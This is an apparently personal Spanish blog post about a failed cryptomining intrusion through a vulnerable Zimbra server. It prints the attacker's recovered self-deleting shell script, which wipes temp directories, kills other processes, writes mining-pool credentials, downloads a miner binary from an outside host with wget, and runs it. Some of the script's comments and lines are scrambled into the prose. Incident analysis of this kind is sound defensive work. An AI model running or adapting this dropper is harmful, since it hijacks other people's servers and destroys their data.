En los primeros intentos este atacante inyecto directamente los binarios de un programa de miner\u00eda de bitcoins, debi\u00f3 ser frustrante darse cuenta que no pod\u00eda ejecutarlos, por supuesto el servidor de la cueva de inmediato se alerto y me mando mensajitos de Oye Drag\u00f3n , ya viste lo que hace este hackersito\u2026 y si fui a ver , vi el ataque como un fracaso total. Por supuesto que el Zimbra est\u00e1 vulnerable, pude decidir simplemente desinstalarlo o actualizarlo. El problema es que si lo desinstalaba el juego terminar\u00eda, es la \u00fanica vulnerabilidad que permite \u201cejecutar\u201d cosas dentro del servidor. Por supuesto mi preocupaci\u00f3n es igual a CERO, para los que llevan a\u00f1os ley\u00e9ndome saben que cada determinado tiempo hago retos en servidores reales donde incluso para ahorrarles el tiempo de buscar un exploit y entrar, yo mismo les entrego acceso directo por telnet o ssh , con cuentas validas, pr\u00e1cticamente servido en bandeja de plata y aun as\u00ed el reto ha sido muy pocas veces superado y cuando lo fue , fue por un error m\u00edo que aunque no vale, cuenta.<\/p>\n
El \u00faltimo intento es algo interesante, en lugar de ingresar los binarios que el atacante ya sab\u00eda que no se iban a ejecutar decidi\u00f3 enviar Shell script que al no ser un programa binario podr\u00eda ser ejecutado o mejor dicho interpretado y por medio de ellos lanzar el ataque y por fin ponerse a minar y tambi\u00e9n tomo medidas para evitar que me diera cuenta, despu\u00e9s de lanzar el ataque el script se autodestruye borr\u00e1ndose con el comando rm y efectivamente el script se borra.<\/p>\n
Es una pena que detr\u00e1s de tanto esfuerzo con unos sencillos movimientos del teclado haya resucitado el archivo eliminado cual carta de yugioh sacada del cementerio. El archivo es el siguiente.<\/p>\n
# add way to kill the exact name of a \"spoofed\" proc name of a skiddie <\/p>\n bot..<\/p>\n # rm oldz # kill existing procs\/could change this to map w\/readlink & proc # write new conf file # download and exec miner corresponding to arch wget -q http:\/\/abksprings.co.za\/v\/m_`uname -m` -O \"$NAME\" # once our cmd is in memory there's no need to keep the conf\/bin Apoco no da ternura en SELF DESTRUCT pone una carita sonriente, seria una pena que el script se ejecuta en un servidor que ha sido asegurado por Last Drag\u00f3n en persona #!\/bin\/bash<\/p>\n
\nrm -rf \"\/tmp\/kpoll\"
\nrm -rf \"\/tmp\/dsys\"
\nrm -rf \"\/tmp\/ksys.cfg\"
\nrm -rf \"\/tmp\/dsys.cfg\"
\nrm -rf \"\/var\/tmp\/\"<\/p>\n
\nkillall kpoll
\nkillall dsys
\nkillall minerd32
\nkillall minerd64
\nkillall b
\nkill -9 $(pidof kpoll)
\nkill -9 $(pidof dsys)
\nkill -9 `pgrep -f stratum`
\nkill -9 `pgrep -f java`<\/p>\n
\n(cat < <- _EOF_\n{\n\"url\" : \"stratum+tcp:\/\/mining.eu.hypernova.pw:3333\",\n\"user\" : \"rastamine.zb\",\n\"pass\" : \"908jlk4\",\n\"quiet\" : true\n}\n_EOF_\n) > \/tmp\/ksys.cfg<\/p>\n
\nARCH=$(uname -m)
\nNAME=\"\/tmp\/kpoll\"<\/p>\n
\nchmod +x $NAME
\neval \"$NAME -B -c \/tmp\/ksys.cfg 2> \/dev\/null\"
\nchk=`pidof kpoll`
\nif [ ! -z \"$chk\" ]
\nthen
\n echo \"$chk\"
\nfi<\/p>\n
\nrm -rf \"\/tmp\/ksys.cfg\"
\nrm -rf \"\/tmp\/kpoll\"
\nrm -rf \"\/tmp\/z.sh\" # self destruct :P<\/code><\/p>\n![\"\"](\"https:\/\/www.lastdragon.net\/misarchivos\/burla\/risalagrimas.gif\")
<\/p>\n